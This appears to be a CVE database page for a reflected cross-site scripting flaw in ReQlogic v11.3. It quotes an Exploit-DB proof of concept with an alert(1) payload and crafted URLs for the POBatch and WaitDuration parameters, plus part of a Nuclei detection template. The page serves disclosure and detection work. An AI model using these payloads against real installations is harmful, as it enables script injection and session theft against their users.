CVE-2022-41441
published 2023-01-20CVE-2022-41441: Multiple cross-site scripting (XSS) vulnerabilities in ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected…
PriorityP340medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
5.30%
91.6th percentile
Multiple cross-site scripting (XSS) vulnerabilities in ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| reqlogic | reqlogic | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
exploitdb·2023-03-28
CVE-2022-41441 ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
---
# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
# Date: 9 October 2022
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://reqlogic.com
# Version: 11.3
# Tested on: Linux
# CVE : 2022-41441
# Proof of Concept:
1- Install ReQlogic v11.3
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.
#XSS Payload:
alert(1)
#Affected Prameters
POBatch
WaitDuration
#Final URLs
http://localost:81/ProcessWait.aspx?POBatch=alert(1)&WaitDuration=3
http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=alert(1)
Nuclei
ReQlogic v11.3 - Cross Site Scripting
nuclei·CVSS 6.1
CVE-2022-41441 [MEDIUM] ReQlogic v11.3 - Cross Site Scripting
ReQlogic v11.3 - Cross Site Scripting
ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
Template:
id: CVE-2022-41441
info:
name: ReQlogic v11.3 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogi
http://packetstormsecurity.com/files/171557/ReQlogic-11.3-Cross-Site-Scripting.htmlhttp://reqlogic.comhttps://okankurtulus.com.tr/2023/01/17/reqlogic-v11-3-unauthenticated-reflected-cross-site-scripting-xss/https://reqlogic.com/http://packetstormsecurity.com/files/171557/ReQlogic-11.3-Cross-Site-Scripting.htmlhttp://reqlogic.comhttps://okankurtulus.com.tr/2023/01/17/reqlogic-v11-3-unauthenticated-reflected-cross-site-scripting-xss/https://reqlogic.com/
2023-01-20
Published